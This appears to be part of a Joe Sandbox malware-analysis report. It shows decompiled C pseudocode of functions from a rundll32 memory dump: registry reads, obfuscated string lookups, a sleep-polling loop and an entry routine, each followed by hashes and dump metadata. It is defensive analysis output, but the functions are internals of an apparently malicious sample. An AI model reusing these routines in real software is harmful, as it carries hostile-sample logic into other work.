                                                                                                                                                                                                                                    			E04C31262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
				signed short _t18;
				intOrPtr _t23;
				signed int _t25;
				signed short _t26;

				if(_a4 != 0) {
					_t18 = E04C39318(_a4, _a8, _a12, __esi); // executed
					_t26 = _t18;
				} else {
					_t26 = E04C36BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t25 = _a8 >> 1;
						if(_t25 == 0) {
							_t26 = 2;
							__imp__( *0x4c3d238, 0, _a12);
						} else {
							_t23 = _a12;
							 *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
							 *__esi = _t23;
						}
					}
				}
				return _t26;
			}







                                                                                                                                                                                                                                    0x04c3126a
                                                                                                                                                                                                                                    0x04c312bf
                                                                                                                                                                                                                                    0x04c312c4
                                                                                                                                                                                                                                    0x04c3126c
                                                                                                                                                                                                                                    0x04c31286
                                                                                                                                                                                                                                    0x04c3128a
                                                                                                                                                                                                                                    0x04c3128f
                                                                                                                                                                                                                                    0x04c31291
                                                                                                                                                                                                                                    0x04c312a1
                                                                                                                                                                                                                                    0x04c312ad
                                                                                                                                                                                                                                    0x04c31293
                                                                                                                                                                                                                                    0x04c31293
                                                                                                                                                                                                                                    0x04c31296
                                                                                                                                                                                                                                    0x04c3129b
                                                                                                                                                                                                                                    0x04c3129b
                                                                                                                                                                                                                                    0x04c31291
                                                                                                                                                                                                                                    0x04c3128a
                                                                                                                                                                                                                                    0x04c312ca

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction ID: 75498ca21332d178e5999bbf3c4f21a91460ee22c9c728d1fbd7f3fafc9ce762
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58011236100249FFDB11DF44CC01FBE3BB6EB44352F188429FA159A160DB71E521DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C354BC, Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C354BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__; // 0x76d24a00
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04C32049(_t10 + 1, _t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04C39039(_t15, _t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                    0x04c354c1
                                                                                                                                                                                                                                    0x04c354cc
                                                                                                                                                                                                                                    0x04c354ce
                                                                                                                                                                                                                                    0x04c354d4
                                                                                                                                                                                                                                    0x04c354d6
                                                                                                                                                                                                                                    0x04c354db
                                                                                                                                                                                                                                    0x04c354e4
                                                                                                                                                                                                                                    0x04c354e8
                                                                                                                                                                                                                                    0x04c354f1
                                                                                                                                                                                                                                    0x04c354f5
                                                                                                                                                                                                                                    0x04c35504
                                                                                                                                                                                                                                    0x04c354f7
                                                                                                                                                                                                                                    0x04c354f8
                                                                                                                                                                                                                                    0x04c354fd
                                                                                                                                                                                                                                    0x04c354fd
                                                                                                                                                                                                                                    0x04c354f5
                                                                                                                                                                                                                                    0x04c354e8
                                                                                                                                                                                                                                    0x04c3550d

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction ID: 02cc1767ceabe43bbaf4506522e15683f0bbcb82dbe63b1938873c3e60093a16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF05E76600149BAEB11D6AA9C40EEF76AFDBC5656F150069A905E3140EA70FF019770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C396A4, Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C396A4(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;

				_t10 =  *0x4c3d270; // 0xd448b889
				_v8 = _t10;
				_v12 = _t10;
				_t23 = 0; // executed
				_t12 = E04C321CD(__ecx,  &_v12); // executed
				if(_t12 != 0) {
					_t14 =  *0x4c3d27c; // 0x202a5a8
					_t4 = _t14 + 0x4c3e796; // 0x74666f53
					_t17 = E04C37A9A(_t4, 0);
					 *0x4c3d33c = _t17;
					if(_t17 != 0) {
						_t18 =  *0x4c3d27c; // 0x202a5a8
						_v8 = _v8 ^ 0x738bb12a;
						_t8 = _t18 + 0x4c3e862; // 0x61636f4c
						_t21 = E04C37A9A(_t8, 1);
						 *0x4c3d344 = _t21;
						if(_t21 != 0) {
							_t23 = 1;
						}
					}
				}
				return _t23;
			}












                                                                                                                                                                                                                                    0x04c396aa
                                                                                                                                                                                                                                    0x04c396b0
                                                                                                                                                                                                                                    0x04c396b3
                                                                                                                                                                                                                                    0x04c396ba
                                                                                                                                                                                                                                    0x04c396bc
                                                                                                                                                                                                                                    0x04c396c3
                                                                                                                                                                                                                                    0x04c396c5
                                                                                                                                                                                                                                    0x04c396ca
                                                                                                                                                                                                                                    0x04c396d5
                                                                                                                                                                                                                                    0x04c396dc
                                                                                                                                                                                                                                    0x04c396e1
                                                                                                                                                                                                                                    0x04c396e3
                                                                                                                                                                                                                                    0x04c396e8
                                                                                                                                                                                                                                    0x04c396ef
                                                                                                                                                                                                                                    0x04c396fb
                                                                                                                                                                                                                                    0x04c39702
                                                                                                                                                                                                                                    0x04c39707
                                                                                                                                                                                                                                    0x04c39709
                                                                                                                                                                                                                                    0x04c39709
                                                                                                                                                                                                                                    0x04c39707
                                                                                                                                                                                                                                    0x04c396e1
                                                                                                                                                                                                                                    0x04c3970e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction ID: bd832aa519261c40106d56889c55850736870fd094121f86b0608dc765d69e43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F04FB9911119ABDB20DFB8D9849DE77FDEB09306F108063E502D7240E6B4EF04DB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C32436, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E04C32436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_t22 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				_t19 = __imp__; // 0x76d26490
				while(1) {
					_v16 = _t15;
					 *_t19(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}









                                                                                                                                                                                                                                    0x04c32436
                                                                                                                                                                                                                                    0x04c32443
                                                                                                                                                                                                                                    0x04c32444
                                                                                                                                                                                                                                    0x04c32445
                                                                                                                                                                                                                                    0x04c3244c
                                                                                                                                                                                                                                    0x04c32452
                                                                                                                                                                                                                                    0x04c3247a
                                                                                                                                                                                                                                    0x04c3247b
                                                                                                                                                                                                                                    0x04c3247e
                                                                                                                                                                                                                                    0x04c32484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32463
                                                                                                                                                                                                                                    0x04c3246d
                                                                                                                                                                                                                                    0x04c32474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32465
                                                                                                                                                                                                                                    0x04c32468
                                                                                                                                                                                                                                    0x04c32488
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x04c32468
                                                                                                                                                                                                                                    0x04c3248f
                                                                                                                                                                                                                                    0x04c32495
                                                                                                                                                                                                                                    0x04c32495
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction ID: c077cb2e74d004b45afec248507e157982e599a806eeea00d2a37484c3300cee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF04975D01219EFDF00DB98D488AEDB7B8EF04306F1480EAE502A7201E3B56B84CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C324E1, Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E04C324E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t14;
				void* _t16;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v12 = _a16;
				_t14 =  *0x4c3d27c; // 0x202a5a8
				_t5 = _t14 + 0x4c3e10c; // 0x6c686b4
				_t7 = _t14 + 0x4c3e2a4; // 0x650053
				_v20 = 3;
				_t16 = E04C39152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
				return _t16;
			}








                                                                                                                                                                                                                                    0x04c324ed
                                                                                                                                                                                                                                    0x04c324ee
                                                                                                                                                                                                                                    0x04c324ef
                                                                                                                                                                                                                                    0x04c324f0
                                                                                                                                                                                                                                    0x04c324f5
                                                                                                                                                                                                                                    0x04c324fc
                                                                                                                                                                                                                                    0x04c32501
                                                                                                                                                                                                                                    0x04c3250b
                                                                                                                                                                                                                                    0x04c32515
                                                                                                                                                                                                                                    0x04c32523
                                                                                                                                                                                                                                    0x04c3252a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction ID: 36fc8b55db0c4b338c47358043cb50035e8671347f461f19c7e448ff76c177b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01C76400109BEDF01DFA8C844CEAB7B9FB08304F018525FA05A6121E771EA159B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38055, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					__imp__(0x4c3d23c);
					if(_t4 == 0) {
						E04C3970F();
					}
				} else {
					_t7 = _t4 - 1;
					if(_t7 == 0) {
						__imp__(0x4c3d23c);
						if(_t7 == 1) {
							_t8 = E04C36A56(_t7, _t9, _t10, _v0); // executed
							if(_t8 != 0) {
								_t12 = 0;
							}
						}
					}
				}
				return _t12;
			}










                                                                                                                                                                                                                                    0x04c3805c
                                                                                                                                                                                                                                    0x04c3805d
                                                                                                                                                                                                                                    0x04c38060
                                                                                                                                                                                                                                    0x04c3808a
                                                                                                                                                                                                                                    0x04c38092
                                                                                                                                                                                                                                    0x04c38094
                                                                                                                                                                                                                                    0x04c38094
                                                                                                                                                                                                                                    0x04c38062
                                                                                                                                                                                                                                    0x04c38062
                                                                                                                                                                                                                                    0x04c38063
                                                                                                                                                                                                                                    0x04c3806a
                                                                                                                                                                                                                                    0x04c38072
                                                                                                                                                                                                                                    0x04c38078
                                                                                                                                                                                                                                    0x04c3807f
                                                                                                                                                                                                                                    0x04c38081
                                                                                                                                                                                                                                    0x04c38081
                                                                                                                                                                                                                                    0x04c3807f
                                                                                                                                                                                                                                    0x04c38072
                                                                                                                                                                                                                                    0x04c38063
                                                                                                                                                                                                                                    0x04c3809c

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction ID: 4a04ccb88ba5bda2151f7304943a8210bcb27564e2d8e12b66644726c4474a96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE0867A3442215797357FB49844B6EA6D3AF01B87F054424F6C5D4070D660FD509EF1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3904E, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				void* _t13;

				_v8 = 1;
				if(_a4 == 0) {
					return E04C36B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
				}
				_t13 = E04C324E1(_a4, _a8, _a12, 1); // executed
				return _t13;
			}





                                                                                                                                                                                                                                    0x04c39059
                                                                                                                                                                                                                                    0x04c3905c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c39082
                                                                                                                                                                                                                                    0x04c39068
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction ID: 28cf19cd797aa6c8156ff40d48a3eca7cf2260302c3701e8bbd86ec869088f2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE04FB2104208FFEF11EF90CC01FAE7B6AEB08349F008055FB1495050D7B2DA20EB94
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3A66E, Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C3A66E(void* __edx, void* __edi, char _a4) {
				void* _t7;
				void* _t12;

				_t7 = E04C37323(__edx, __edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					_push(_t12);
					_push(_a4);
					_push(__edi);
					L04C35544();
					 *((char*)(_t12 + __edi)) = 0;
					E04C39039(_t7, _a4);
				}
				return _t12;
			}





                                                                                                                                                                                                                                    0x04c3a67a
                                                                                                                                                                                                                                    0x04c3a67f
                                                                                                                                                                                                                                    0x04c3a683
                                                                                                                                                                                                                                    0x04c3a685
                                                                                                                                                                                                                                    0x04c3a686
                                                                                                                                                                                                                                    0x04c3a689
                                                                                                                                                                                                                                    0x04c3a68a
                                                                                                                                                                                                                                    0x04c3a695
                                                                                                                                                                                                                                    0x04c3a699
                                                                                                                                                                                                                                    0x04c3a699
                                                                                                                                                                                                                                    0x04c3a6a2

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: 6a21401bd9ce31c0fa2b92baf772b81ff30ca3ea67ee023449d250fdcad060e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E08672401228B6D7122A94DC40EEF7F6E8F45692F004025FE4849100D632EA10A7E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3AC81, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC81() {

				E04C3ADE5(0x4c3c344, 0x4c3d15c); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x04c3ac93
                                                                                                                                                                                                                                    0x04c3ac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction ID: 6172547efe2fd1d4fe36d2e35d9d7bae39d88ad9d410c6f8ed1abe43e6b091ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B012C6368001BF300811052D02C3E031FC0C0E27320C53AB441E4000A4867C191031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3AC9C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC9C() {

				E04C3ADE5(0x4c3c344, 0x4c3d158); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x04c3ac93
                                                                                                                                                                                                                                    0x04c3ac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
                                                                                                                                                                                                                                    • Instruction ID: 4cbd4f20dcf05f2ced086aab8974427f6524f5768af576d509355b42992212df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
